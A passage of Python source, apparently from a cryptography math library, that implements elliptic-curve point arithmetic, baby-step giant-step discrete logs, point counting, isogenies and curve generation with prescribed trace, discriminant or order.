[idx for idx, point in enumerate(points) if not point._z]\n invs = batch_inv([point._z for point in points if point._z])\n zero = self._x.ring.zero\n\n total = 0\n for idx in zeroes:\n invs.insert(idx+total, zero)\n total += 1\n\n return invs\n\n\n @RUNTIME.global_cache(2)\n def _build_bsgs_table(self, g: 'WeierstrassPoint', end: int, start: int, r: int, n: int):\n search_range = end - start\n table = {}\n y_table = {}\n m = kth_root(search_range // n, 2)\n\n # If we have no congruence, we can apply the involution speedup\n if n == 1:\n # TODO: How to reduce baby steps with involution map?\n # bs_size = max(m // 2, 1)\n bs_size = m\n else:\n bs_size = m\n\n # Align `e` with congruence\n e = g * ((r-start) % n)\n G = g*n\n\n # Defer inversions until we can batch them\n points = []\n for i in range(bs_size):\n points.append(e)\n e = e.add_no_cache(G)\n\n invs = self.__batch_invert_zs(points)\n\n # Perform inversions then cache\n for i in range(bs_size):\n e = points[i]\n z = invs[i]\n if z:\n e._x, e._y, e._z = e._x*z, e._y*z, e._z*z\n table[e.x] = i\n y_table[e.x] = e.y\n\n return table, y_table, m\n\n\n\n def bsgs(self, g: 'WeierstrassPoint', end: int, start: int=0, congruence: tuple=None, e: 'WeierstrassPoint'=None) -> int:\n \"\"\"\n References:\n \"MIT class 18.783, lecture notes #8: Point counting\" (https://math.mit.edu/classes/18.783/2019/LectureNotes8.pdf)\n \"Computing Elliptic Curve Discrete Logarithms with Improved Baby-step Giant-step Algorithm\" (https://eprint.iacr.org/2015/605.pdf)\n \"\"\"\n h = self\n if congruence:\n r, n = congruence\n else:\n r, n = 0, 1\n\n # Our BSGS implementation fails for points of order 2 since the point at infinity and our `x`\n # are both zero\n if not g*2:\n d = int(h == g)\n if d >= end or d % n != r:\n raise SearchspaceExhaustedException(f'Discrete log found but does not match parameters: d = {d}')\n else:\n return d\n\n table, y_table, m = self._build_bsgs_table(g, end, start, r, n)\n\n mb = m.bit_length()\n o = g*start\n factor = -g * (m*n)\n z = h-o\n\n for b in range((m+mb-1) // mb):\n points = []\n for i in range(mb):\n points.append(z)\n z = z.add_no_cache(factor)\n\n invs = self.__batch_invert_zs(points)\n\n for i, (e, inv) in enumerate(zip(points, invs)):\n x = e._x*inv\n if x in table:\n baby_idx = table[x]\n if y_table[x] != e._y*inv:\n baby_idx = -baby_idx\n\n return (m*(mb*b+i) + baby_idx)*n + start + ((r-start) % n)\n\n\n raise SearchspaceExhaustedException(\"This shouldn't happen; check your arguments\")\n\n\n\n @RUNTIME.global_cache()\n def embedding_degree(self) -> int:\n from samson.math.algebra.rings.integer_ring import ZZ\n\n Fo = self.ring.ring.order()\n Eo = self.order()\n\n Zem = (ZZ/ZZ(Eo)).mul_group()\n return Zem(Fo).order()\n\n\n\nclass PointAtInfinity(WeierstrassPoint):\n def __reprdir__(self):\n return ['curve']\n\n\n def __hash__(self):\n return object.__hash__(self)\n\n\n def __neg__(self) -> 'WeierstrassPoint':\n return self\n \n\n def order(self):\n return 1\n\n\n\nclass WeierstrassCurve(Ring):\n \"\"\"\n Elliptic curve of form y**2 = x**3 + a*x + b\n \"\"\"\n\n def __init__(self, a: RingElement, b: RingElement, ring: Ring=None, base_tuple: tuple=None, cardinality: int=None, check_singularity: bool=True, cm_discriminant: int=None, embedding_degree: int=None):\n \"\"\"\n Parameters:\n a (RingElement): `a` coefficient.\n b (RingElement): `b` constant.\n ring (Ring): Underlying ring.\n base_tuple (tuple): Tuple representing the base point 'G'.\n cardinality (int): Number of points on the curve.\n check_singularity (bool): Check if the curve is singular (no cusps or self-intersections).\n \"\"\"\n from samson.math.symbols import Symbol\n\n if not ring:\n if not hasattr(a, 'ring'):\n ring = b.ring\n\n elif not hasattr(b, 'ring'):\n ring = a.ring\n\n else:\n if a.ring.is_superstructure_of(b.ring):\n ring = a.ring\n else:\n ring = b.ring\n\n\n self.ring = ring or a.ring\n self.a = self.ring(a)\n self.b = self.ring(b)\n\n\n if check_singularity:\n if (4 * a**3 + 27 * b**2) == self.ring.zero:\n raise ValueError(\"Elliptic curve can't be singular\")\n\n if base_tuple:\n base_tuple = WeierstrassPoint(*base_tuple, self)\n\n self.G_cache = base_tuple\n self.dpoly_cache = {}\n\n self.cardinality_cache = cardinality\n self.curve_poly_ring = self[Symbol('x'), Symbol('y')]\n\n self.zero = PointAtInfinity(self.ring.zero, self.ring.one, self, self.ring.zero)\n self.PAF_cache = self.zero\n self.__cm_discriminant_cache = cm_discriminant\n self.__embedding_degree = embedding_degree\n\n\n\n def __reprdir__(self):\n return ['a', 'b', 'cardinality_cache', 'ring']\n\n\n\n def shorthand(self) -> str:\n return f'WeierstrassCurve{{a={self.a}, b={self.b}}}'\n\n\n def __getitem__(self, args):\n from samson.math.algebra.rings.curve_polynomial_ring import CurvePolynomialRing\n if type(args) is tuple:\n return CurvePolynomialRing(self.ring[args[0]], self.a, self.b)\n else:\n return super().__getitem__(args)\n\n\n def coerce(self, x: 'RingElement', y: 'RingElement'=None, verify: bool=True) -> WeierstrassPoint:\n if issubclass(type(x), WeierstrassPoint):\n if x.curve == self:\n return x\n else:\n return self(x.x, x.y)\n\n if y is not None:\n x, y = self.ring(x), self.ring(y)\n if verify and y**2 != x**3 + self.a*x + self.b:\n raise CoercionException(f'Point ({x}, {y}) not on curve')\n\n return WeierstrassPoint(x, y, self)\n else:\n return self.recover_point_from_x(x)\n\n\n def __call__(self, x: 'RingElement', y: 'RingElement'=None, verify: bool=True) -> WeierstrassPoint:\n return self.coerce(x, y, verify)\n\n\n def __eq__(self, other: 'WeierstrassCurve') -> bool:\n return type(other) == type(self) and self.a == other.a and self.b == other.b and self.ring == other.ring\n\n\n def __hash__(self):\n return hash((self.a, self.b))\n\n\n def __deepcopy__(self, memo):\n result = WeierstrassCurve(a=self.a, b=self.b, ring=self.ring, base_tuple=(self.G.x, self.G.y), cardinality=self.cardinality_cache)\n memo[id(self)] = result\n return result\n\n\n @property\n def p(self) -> int:\n return self.ring.characteristic()\n \n\n def defining_polynomial(self) -> 'Polynomial':\n from samson.math.symbols import Symbol\n x = Symbol('x')\n _ = self.ring[x]\n return x**3 + self.a*x + self.b\n\n\n def characteristic_polynomial(self) -> 'Polynomial':\n from samson.math.symbols import Symbol\n from samson.math.algebra.rings.integer_ring import ZZ\n x = Symbol('x')\n _ = ZZ[x]\n return x**2 - self.trace()*x + self.p\n\n\n @staticmethod\n def random_curve(n: RingElement) -> 'WeierstrassCurve':\n R = n.ring\n ring = R/n\n\n while True:\n x = R.random(n)\n y = R.random(n)\n a = R.random(n)\n b = (y**2 - x**3 - (a * x))\n\n g = gcd(int(4 * a**3 - 27 * b**2), n)\n if g != n:\n break\n\n curve = WeierstrassCurve(a=a, b=b, ring=ring, base_tuple=(x, y))\n return curve, g\n\n\n def formal_group(self) -> 'EllipticCurveFormalGroup':\n from samson.math.algebra.curves.elliptic_curve_formal_group import EllipticCurveFormalGroup\n return EllipticCurveFormalGroup(self)\n\n\n def frobenius_endomorphism(self) -> Map:\n F = self.ring.frobenius_endomorphism()\n return Map(domain=self, codomain=self, map_func=lambda P: self(F(P.x), F(P.y)))\n\n\n def find_gen(self) -> WeierstrassPoint:\n return self.abelian_group_generators()[0]\n \n\n def a_invariants(self):\n z = self.ring.zero\n return z, z, z, self.a, self.b\n\n\n def b_invariants(self):\n a1, a2, a3, a4, a6 = self.a_invariants()\n\n a12 = a1**2\n a32 = a3**2\n a24 = a2*4\n a64 = a6*4\n return a12 + a24, a1*a3 + a4*2, a32 + a64, a12 * a6 + a24 + a64 - a1*a3*a4 + a2*a32 - a4**2\n\n\n def c_invariants(self):\n b2, b4, b6, _b8 = self.b_invariants()\n return b2**2 - b4*24, -b2**3 + b2*b4*36 - b6*216\n \n\n @RUNTIME.global_cache()\n def isomorphisms(self, other: 'WeierstrassCurve') -> list:\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_generic.py#L2283\n \"\"\"\n from samson.math.symbols import Symbol\n from samson.math.algebra.curves.elliptic_curve_isomorphism import EllipticCurveIsomorphism\n\n E, F = self, other\n j = E.j_invariant()\n R = E.ring\n\n if j != other.j_invariant():\n raise NoSolutionException('Curves are not isomorphic')\n\n a1E, a2E, a3E, _a4E, _a6E = E.a_invariants()\n a1F, a2F, a3F, _a4F, _a6F = F.a_invariants()\n c4E, c6E = E.c_invariants()\n c4F, c6F = F.c_invariants()\n\n if not j:\n m, um = 6, c6E/c6F\n\n elif j == R(1728):\n m, um = 4, c4E/c4F\n\n else:\n m, um = 2, (c6E*c4F)/(c6F*c4E)\n\n x = Symbol('x')\n _P = R[x]\n us = list((x**m - um).roots())\n\n isos = []\n for u in us:\n s = (a1F*u - a1E)/2\n r = (a2F*u**2 + a1E*s + s**2 - a2E)/3\n t = (a3F*u**3 - a1E*r - a3E)/2\n isos.append(EllipticCurveIsomorphism(E, F, u, r, s, t))\n \n return isos\n\n\n\n @RUNTIME.global_cache()\n def cardinality(self, algorithm: EllipticCurveCardAlg=EllipticCurveCardAlg.AUTO, check_supersingular: bool=True) -> int:\n \"\"\"\n Calculates the cardinality (number of points) of the curve and caches the result.\n\n Parameters:\n algorithm (EllipticCurveCardAlg): Algorithm to use.\n check_supersingular (bool): Whether or not to check whether the curve is supersingular.\n\n Returns:\n int: Cardinality of the curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> from samson.math.general import find_prime\n >>> # Uses a hybrid of BSGS and Schoofs for medium size curves\n >>> R = ZZ/ZZ(find_prime(20))\n >>> E, _ = EllipticCurve.random_curve(R.quotient)\n >>> E.random()*E.cardinality() == E.zero\n True\n\n >>> # Includes checks for supersingular curves\n >>> E = EllipticCurve.generate_supersingular_over_ring(R)\n >>> E.is_supersingular()\n True\n\n >>> E.random()*E.order() == E.zero\n True\n\n >>> # Uses bruteforce for small curves\n >>> R = ZZ/ZZ(find_prime(10))\n >>> E, _ = EllipticCurve.random_curve(R.quotient)\n >>> E.random()*E.cardinality() == E.zero\n True\n\n \"\"\"\n if not self.cardinality_cache:\n q = self.ring.order()\n p = self.ring.characteristic()\n\n _ipp, pk, k = is_perfect_power(q)\n\n # Finite field extension\n if pk != q and not self.a.degree() and not self.b.degree():\n E = EllipticCurve(self.a[0], self.b[0])\n t = E.trace()\n s = [2, t]\n\n for n in range(1, k):\n sn1 = t*s[n] - p*s[n-1]\n s.append(sn1)\n\n self.cardinality_cache = p**k + 1 - s[-1]\n return self.cardinality_cache\n\n\n if check_supersingular and self.is_supersingular():\n if not is_prime(p):\n raise RuntimeError('Supersingular curve over ring with non-prime power order')\n\n self.cardinality_cache = (p+1)**k\n return self.cardinality_cache\n\n\n if algorithm == EllipticCurveCardAlg.AUTO:\n curve_size = p.bit_length()\n\n if curve_size < 11:\n algorithm = EllipticCurveCardAlg.BRUTE_FORCE\n elif curve_size <= 160:\n algorithm = EllipticCurveCardAlg.BSGS\n else:\n algorithm = EllipticCurveCardAlg.SCHOOFS\n\n\n if algorithm == EllipticCurveCardAlg.BRUTE_FORCE:\n if self.ring.characteristic() == self.ring.order():\n P = self.random()\n start, end = hasse_frobenius_trace_interval(p)\n\n PC = P.cache_mul(p.bit_length())\n\n while not all(PC*i for i in sieve_of_eratosthenes(end)):\n P = self.random()\n PC = P.cache_mul(p.bit_length())\n\n for i in range(start, end):\n if not PC*(p+i):\n return p+i\n\n\n else:\n points = []\n\n for i in range(g.order()):\n try:\n points.append(self(g*i))\n except NoSolutionException:\n pass\n\n order = len(set(points + [-point for point in points]))+1\n\n self.cardinality_cache = order\n\n\n elif algorithm == EllipticCurveCardAlg.BSGS:\n # This is pretty slick. The order is at minimum `p - 2*sqrt(p)`. For p > 43, `2 * (p - 2*sqrt(p))`\n # is always outside of the interval. This means if we find a point with an order\n # greater than or equal to `(p - 2*sqrt(p))`, that has to be the order of the curve.\n # Additionally, due to Langrange's theorem, every element's order is a divisor of\n # the group's order. If we only search inside of the interval, and the element's\n # order is greater than the interval, then the discrete logarithm of the point\n # at infinity will be the curve's order\n start, end = hasse_frobenius_trace_interval(p)\n n, m = 1, 1\n largest_elem = self.zero\n\n if p.bit_length() > 64 and self.a:\n from samson.math.algebra.curves.sea import elkies_trace_mod_l\n parity = int(self.defining_polynomial().is_irreducible())\n\n # Here we attempt to balance the exponential time BSGS and poly time Schoof\n trace_mods = [t_mod for t_mod in [3, 5, 7, 11, 13][:round(math.log(p.bit_length(), 3.5))] if t_mod % n or n < 2]\n elkies_con = []\n \n for l in primes(3, p.bit_length() // 2):\n try:\n elkies_con.append(elkies_trace_mod_l(self, l))\n if p in trace_mods:\n trace_mods.remove(l)\n except NoSolutionException:\n pass\n\n\n # If we're going to 11, we might as well use 3^2, too\n if 11 in trace_mods:\n trace_mods[0] = 9\n\n if trace_mods or elkies_con:\n o_con = crt(elkies_con + [frobenius_trace_mod_l(self, t_mod) for t_mod in trace_mods])\n r = p+1-o_con[0] % o_con[1]\n order_congruence = (int(r), int(o_con[1]))\n else:\n order_congruence = (0, 1)\n\n\n order_congruence = crt([order_congruence, (parity, 2)])\n else:\n order_congruence = (0, 1)\n\n # Computes the order of the curve even in non-cyclic groups\n while n*m < (start + p):\n g = self.random()\n if g and not g*n:\n # If this is true, then `n` is the sqrt of the curve's prime.\n # It's possible this curve is actually sqrt(p)Z x sqrt(p)Z,\n # so we're looking for a linearly independent point\n if n == end // 2 - 1:\n g.order_cache = g.find_maximum_subgroup(n)\n j, k = g.linear_relation(largest_elem)\n if not j:\n m = lcm(m, k)\n\n continue\n\n\n g_ord = self.zero.bsgs(g, start=start + p, end=end + p, congruence=crt([(0, n), order_congruence]))\n n = lcm(g_ord, n)\n g.order_cache = g_ord\n\n if g_ord != n:\n g = g.merge(largest_elem)\n\n largest_elem = g\n\n\n order = n*m\n if not self.G_cache:\n self.G_cache = largest_elem\n\n self.cardinality_cache = order\n\n elif algorithm == EllipticCurveCardAlg.SCHOOFS:\n self.cardinality_cache = schoofs_algorithm(self)\n\n else:\n raise ValueError(f\"Unkown EllipticCurveCardAlg '{algorithm}'\")\n\n return self.cardinality_cache\n\n\n def j_invariant(self) -> 'RingElement':\n \"\"\"\n References:\n https://en.wikipedia.org/wiki/Supersingular_isogeny_key_exchange#Background\n \"\"\"\n R = self.ring\n a3 = R(self.a)**3\n return 1728*((4*a3)/(4*a3 + 27*R(self.b)**2))\n\n\n @RUNTIME.global_cache()\n def is_supersingular(self) -> bool:\n \"\"\"\n References:\n https://en.wikipedia.org/wiki/Supersingular_elliptic_curve#Definition\n \"Elliptic Curves: Number Theory and Cryptography, 4.37\" (https://people.cs.nctu.edu.tw/~rjchen/ECC2012S/Elliptic%20Curves%20Number%20Theory%20And%20Cryptography%202n.pdf)\n \"\"\"\n R = self.ring\n p = R.characteristic()\n j = self.j_invariant()\n\n if p % 3 == 2 and j == R(0):\n return True\n\n elif p % 4 == 3 and j == R(1728):\n return True\n\n elif self.cardinality_cache or p < 233:\n return not self.cardinality(check_supersingular=False) % (p+1)\n\n else:\n _, p, n = is_perfect_power(R.order())\n return is_prime(p) and not self.random()*(p+1)**n\n\n\n\n @RUNTIME.global_cache()\n def embedding_degree(self) -> int:\n if self.__embedding_degree is not None:\n return self.__embedding_degree\n else:\n from samson.math.algebra.rings.integer_ring import ZZ\n\n Fo = self.ring.order()\n Eo = self.order()\n\n Zem = (ZZ/ZZ(Eo)).mul_group()\n return Zem(Fo).order()\n\n\n\n def trace_of_frobenius(self) -> int:\n return self.ring.order() + 1 - self.cardinality()\n\n\n trace = trace_of_frobenius\n\n\n def order(self) -> int:\n return self.cardinality()\n\n\n def characteristic(self) -> int:\n return self.G.order()\n\n\n @property\n def G(self) -> WeierstrassPoint:\n if not self.G_cache:\n self.G_cache = self.find_gen()\n\n return self.G_cache\n\n\n @property\n def one(self):\n return self.G\n\n\n @property\n def POINT_AT_INFINITY(self) -> WeierstrassPoint:\n if not self.PAF_cache:\n self.PAF_cache = self.zero\n\n return self.PAF_cache\n\n\n @RUNTIME.global_cache()\n def cm_discriminant(self) -> int:\n \"\"\"\n References:\n https://safecurves.cr.yp.to/disc.html\n \"\"\"\n if self.__cm_discriminant_cache is not None:\n return self.__cm_discriminant_cache\n else:\n from samson.math.algebra.rings.integer_ring import ZZ\n t = self.trace()\n p = self.ring.characteristic()\n D = factor(t**2-4*p, user_stop_func=lambda n, _: ZZ(n).is_square()).square_free().recombine()\n\n if D % 4 != 1:\n D *= 4\n\n return D\n\n\n\n @staticmethod\n def from_j(j: RingElement) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` with desired `j`-invariant.\n\n Parameters:\n j (RingElement): `j`-invariant of curve.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n \"\"\"\n R = j.ring\n if j == R.zero:\n a, b = R.zero, R.one\n\n elif j == R(1728):\n a, b = R.one, R.zero\n\n else:\n k = j-1728\n a, b = -3*j*k, -2*j*k**2\n\n return WeierstrassCurve(a, b)\n\n\n generate_curve_with_j = from_j\n\n\n def quadratic_twist(self, D: RingElement=None) -> 'WeierstrassCurve':\n \"\"\"\n Returns the quadratic twist by `D`.\n\n Parameters:\n D (RingElement): Twist parameter:\n\n Returns:\n WeierstrassCurve: The twist.\n \"\"\"\n R = self.ring\n p = R.characteristic()\n\n if D is None:\n while True:\n D = R.random()\n if not D.is_square():\n break\n else:\n if R(D).is_square():\n raise ValueError(f'Cannot compute quadratic twist. {D} is square')\n\n\n b4, b6 = 2*self.a, 4*self.b\n twist = WeierstrassCurve(8*b4*D**2, 16*b6*D**3)\n\n if self.cardinality_cache:\n twist.cardinality_cache = 2*p+2-self.order()\n\n return twist\n\n\n def isogeny(self, P: WeierstrassPoint) -> 'EllipticCurveIsogeny':\n \"\"\"\n Finds the an elliptic curve isogeny whose kernel is `P`.\n\n Parameters:\n P (WeierstrassPoint): Kernel of isogeny.\n\n Returns:\n EllipticCurveIsogeny: Isogeny with kernel of `P`.\n\n References:\n https://epub.jku.at/obvulihs/content/titleinfo/2581853/full.pdf\n \"\"\"\n EllipticCurveIsogeny = _elliptic_curve_isogeny.EllipticCurveIsogeny\n\n if P.ring != self:\n raise ValueError(f'{P} is not on {self}')\n\n E = self\n n = P.order()\n n_facs = factor(n)\n phi = None\n\n for p, e in n_facs.items():\n Q = P*(n // p**e)\n\n for i in range(1, e+1):\n phi = EllipticCurveIsogeny(E, Q*(p**(e-i)), pre_isomorphism=phi)\n Q = phi._rat_map(Q)\n E = phi.codomain\n\n P = phi(P)\n\n return phi\n\n\n def _check_trace(self, trace: int) -> bool:\n return not bool(self.random()*(self.p+1-trace))\n\n\n\n @staticmethod\n def generate_curve_with_trace(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` with field size `bit_size` and trace `trace`.\n\n Parameters:\n bit_size (int): Size of the underlying finite field in bits.\n trace (int): Trace curve should have.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> # Can generate curves with odd trace\n >>> EllipticCurve.generate_curve_with_trace(256, 1)._check_trace(1)\n True\n\n >>> # Can generate curves with negative odd trace\n >>> EllipticCurve.generate_curve_with_trace(256, -13)._check_trace(-13)\n True\n\n >>> # Can generate curves with even trace\n >>> EllipticCurve.generate_curve_with_trace(256, 2)._check_trace(2)\n True\n\n >>> # Can generate curves with negative even trace and multiples of 8\n >>> EllipticCurve.generate_curve_with_trace(256, -8)._check_trace(-8)\n True\n\n >>> # Can generate curves with zero trace\n >>> EllipticCurve.generate_curve_with_trace(256, 0)._check_trace(0)\n True\n\n >>> # Can generate curves with trace congruent to 5430965739045 % 10861931478090\n >>> EllipticCurve.generate_curve_with_trace(256, 5430965739045)._check_trace(5430965739045)\n True\n\n \"\"\"\n hasse_range = hasse_frobenius_trace_interval(2**bit_size)\n\n if trace not in range(*hasse_range):\n raise ValueError(f\"Trace {trace} not within Hasse bounds {hasse_range} for bit_size {bit_size}\")\n\n if trace % 2:\n if trace % 10861931478090 == 5430965739045 or trace % 4555003523070 == 2277501761535:\n return EllipticCurve._generate_curve_with_odd_trace_slow(bit_size, trace)\n else:\n return EllipticCurve._generate_curve_with_odd_trace_fast(bit_size, trace)\n elif not trace:\n return EllipticCurve._generate_supersingular_deg_1(bit_size)\n else:\n return EllipticCurve._generate_curve_with_even_trace(bit_size, trace)\n\n\n\n @staticmethod\n def _generate_supersingular_deg_1(bit_size: int=None, p:int=None) -> 'WeierstrassCurve':\n from samson.math.algebra.rings.integer_ring import ZZ\n from samson.math.prime_gen import PrimeEngine\n\n if not (bit_size or p):\n raise ValueError(\"Either 'bit_size' or 'p' must be specified\")\n\n p = p or PrimeEngine.GENS.RANDOM(bit_size).generate([lambda p: p % 4 == 3])\n\n R = ZZ/ZZ(p)\n a = R.random()\n\n while not a.is_square():\n a = R.random()\n\n E = EllipticCurve(a, R.zero)\n E.cardinality_cache = p + 1\n return E\n\n\n\n @staticmethod\n def generate_supersingular_over_ring(R: Ring) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` over field `R`.\n\n Parameters:\n R (Ring): Base field.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> R = ZZ/ZZ(find_prime(20))\n >>> E = EllipticCurve.generate_supersingular_over_ring(R)\n >>> E.is_supersingular()\n True\n\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n p = R.characteristic()\n Z = ZZ/ZZ(p)\n\n for i in range(3, 500):\n d = Z(i)\n\n if (p % 4 == 1) == d.is_square():\n continue\n\n D = -ZZ(d)\n\n if D % 4 != 1:\n D *= 4\n\n try:\n E = EllipticCurve.from_D(int(D), R, strict=False)\n if E.is_supersingular():\n return E\n\n except NoSolutionException:\n pass\n\n raise SearchspaceExhaustedException\n\n\n\n @staticmethod\n def from_D(D: int, R: Ring, strict: bool=True):\n \"\"\"\n Generates a `WeierstrassCurve` over field `R` with complex multiplication discriminant `D`.\n\n Parameters:\n D (int): Complex multiplication discriminant.\n R (Ring): Base field.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n \"\"\"\n if strict:\n sols = _get_possible_traces_for_D(D, R.characteristic())\n\n order = 0\n Hd = hilbert_class_polynomial(-D)\n\n if Hd.degree() == 1:\n j_invs = [R(Hd.roots()[0])]\n else:\n j_invs = Hd.change_ring(R).roots()\n\n\n if j_invs:\n E = EllipticCurve.from_j(j_invs[0])\n\n if E.p.bit_length() > 8 and strict:\n P = E.random()\n\n def try_trace(t):\n if not P*(E.p + 1 - t):\n return E.p + 1 - t\n\n elif not P*(E.p + 1 + t):\n return E.p + 1 + t\n\n # While we're here, let's get the order\n for t in sols:\n order = try_trace(t)\n if order:\n break\n\n if order:\n E.cardinality_cache = order\n\n return E\n else:\n raise NoSolutionException\n\n\n generate_curve_with_D = from_D\n\n\n @staticmethod\n def _generate_curve_with_odd_trace_fast(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n References:\n \"Generating Anomalous Elliptic Curves\" (http://www.monnerat.info/publications/anomalous.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n if not trace % 2:\n raise ValueError(\"Algorithm can only generate curves with odd trace\")\n\n\n # Prime D's congruent to 3 % 8\n # Sage code to generate:\n\n # D_MAP = {}\n # for i in range(1, 10000):\n # D = -(3+8*i)\n # if is_prime(-D):\n # roots = hilbert_class_polynomial(D).roots()\n # if roots:\n # D_MAP[D] = roots[0][0]\n\n\n abs_trace = abs(trace)\n valid_Ds = [D for D in _D_MAP if gcd(D, abs_trace) == 1]\n\n # `trace` can't be 5430965739045 mod 10861931478090 or 2277501761535 mod 4555003523070\n # (odd multiples of 3*5*7*17*13 and 3*5*7*17*31, which are the minimum factors to not be coprime to any of our discriminants)\n if not valid_Ds:\n raise ValueError(\"Odd trace algorithm cannot find suitable discriminant\")\n\n\n D = valid_Ds[0]\n m_size = (2**bit_size // D).bit_length() // 2\n\n # Find a prime such that 4p = x^2 + Dy^2, and x=trace\n # This construction will force the trace to be +-x\n while True:\n m = random_int_between(2**(m_size-1)+3, 2**m_size)\n m -= (m % 4)-1\n p = D*m*(m+1) + (D + abs_trace**2) // 4\n\n if p.bit_length() == bit_size and is_prime(p) and not (4*p - abs_trace**2) % D:\n y2 = (4*p - abs_trace**2) // D\n if ZZ(y2).is_square():\n break\n\n\n # Find a j-invariant\n R = ZZ/ZZ(p)\n E = EllipticCurve.from_D(D, R)\n P = E.random()\n\n if P*(p+1-trace):\n E = E.quadratic_twist()\n\n E.cardinality_cache = p+1-trace\n return E\n\n\n @staticmethod\n def _generate_curve_with_odd_trace_slow(bit_size: int, trace: int) -> 'WeierstrassCurve':\n from samson.math.algebra.rings.integer_ring import ZZ\n\n # These discriminants were selected since they are coprime with\n # the ones used in the \"fast\" algorithm like so:\n # l = lcm(11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427)\n # possible = [d for d in range(1000) if -d % 4 in [0, 1] and gcd(d, l) == 1 and d % 2 == 1]\n\n # This shows there's a lot of possible curves even for the smallest value:\n # congruence_bits = (10861931478090).bit_length()\n # approx_primes = pnt(2**congruence_bits)-pnt(2**(congruence_bits-1))\n # num_squares = kth_root(approx_primes // 59, 2)\n\n\n for D in [59, 71, 79, 83, 103, 107, 127, 131, 139, 151]:\n start = 2**(bit_size-1) + 2**(bit_size-2) + 1\n start -= trace**2\n start //= D\n start *= 4\n first_root = kth_root(start, 2)\n\n i = random_int(2**(bit_size // 4) // D)\n p = 0\n while p.bit_length() <= bit_size:\n r = first_root + i\n p = (r**2*D + trace**2) // 4\n i += 1\n\n if p.bit_length() == bit_size and is_prime(p):\n try:\n R = ZZ/ZZ(p)\n E = EllipticCurve.generate_curve_with_D(D, R)\n if E.trace() == trace:\n return E\n elif E.trace() == -trace:\n return E.quadratic_twist()\n\n except NoSolutionException:\n pass\n \n raise NoSolutionException(\"No suitable discriminant/prime found\")\n\n\n\n @staticmethod\n def _generate_curve_with_even_trace(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n References:\n \"ELLIPTIC CURVES OF NEARLY PRIME ORDER.\" (https://eprint.iacr.org/2020/001.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def build_curve(p, a, negate):\n mod = -negate*2 + 1\n R = ZZ/ZZ(p)\n o = p + 1 + a*2\n E = EllipticCurve(R(mod*a), R(0))\n\n if not E.random()*o:\n E.cardinality_cache = o\n return E\n\n E = E.quadratic_twist()\n\n if not E.random()*o:\n E.cardinality_cache = o\n return E\n\n\n\n # Uses primes that are 5 mod 8\n # Cannot tolerate traces divisible by 8\n def five_mod_eight_gen(p, a):\n E = None\n if p % 8 == 5:\n pdash = (p-3) // 2\n\n if is_prime(pdash):\n E = build_curve(p, a, False)\n\n\n pbar = (p+5) // 2\n if is_prime(pbar):\n E = build_curve(p, a, True)\n\n return E\n\n\n # Uses primes that are 1 mod 8\n # Only generates traces divisible by 4\n def one_mod_eight_gen(p, a):\n R = ZZ/ZZ(p)\n while True:\n k = R.random()\n if not k.is_square():\n break\n\n E = EllipticCurve(-k, R(0))\n o = p + 1 - 2*a\n if E.random()*o:\n E = E.quadratic_twist()\n\n E.cardinality_cache = o\n return E\n\n\n\n if trace % 2:\n raise ValueError(\"Even trace algorithm can only generate curves with even trace\")\n\n\n if trace % 8:\n curve_gen_func = five_mod_eight_gen\n else:\n curve_gen_func = one_mod_eight_gen\n\n\n # The algorithm fails if trace is negative\n # Instead, remove the negative and return the twist at the end\n abs_trace = trace\n if trace < 0:\n abs_trace = -trace\n\n\n # p must be [1, 5] mod 8\n # If a is odd, then b should be even\n a = abs_trace // 2\n b_size = (2**bit_size - a**2).bit_length() // 2\n b = 2**(b_size-1) + 2**(b_size-2) - random_int(2**(b_size-5))*2 + ((a+1) % 2)\n max_b = 2**b_size\n\n E = None\n while b < max_b:\n b += 2\n p = a**2 + b**2\n if is_prime(p):\n E = curve_gen_func(p, a)\n\n if E:\n if E.trace() != trace:\n E = E.quadratic_twist()\n return E\n\n\n raise SearchspaceExhaustedException\n\n\n\n @staticmethod\n def generate_curve_with_order(order: int, max_r: int=20) -> 'WeierstrassCurve':\n \"\"\"\n Generates the curve with the prescribed order.\n\n Parameters:\n order (int): Order of the curve to generate.\n\n Returns:\n WeierstrassCurve: Generated curve.\n\n References:\n \"Constructing elliptic curves of prime order\" (http://www.math.leidenuniv.nl/~psh/bs.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def construct_prime(N: int, max_r: int):\n from samson.math.factorization.factors import Factors\n from math import log2\n\n logN = int(log2(N))\n Zn = ZZ/ZZ(N)\n\n for r in range(max_r):\n S = {}\n\n op = [p for p in primes(max(r*logN, 3), (r+1)*logN) if (ZZ/ZZ(p))(N).is_square()]\n S = [Zn(p) for p in op if Zn(p).is_square()]\n\n fac = Factors({p:1 for p in S})\n for i in range(1, len(S)+1):\n for l in fac.combinations(i):\n D = int(l.recombine())\n\n if -D % 8 == 5:\n try:\n for t in _get_possible_traces_for_D(D, N):\n for trace in [t, -t]:\n prime = N + 1 - trace\n\n if is_prime(prime):\n return D, prime\n\n except NoSolutionException:\n pass\n\n raise NoSolutionException\n\n # Find suitable prime and discriminant\n D, p = construct_prime(order, max_r)\n Zp = ZZ/ZZ(p)\n E = EllipticCurve.from_D(D, Zp)\n\n # Either this curve or the twist has the correct order\n if E.random()*order:\n E = E.quadratic_twist()\n\n E.cardinality_cache = order\n return E\n\n\n\n 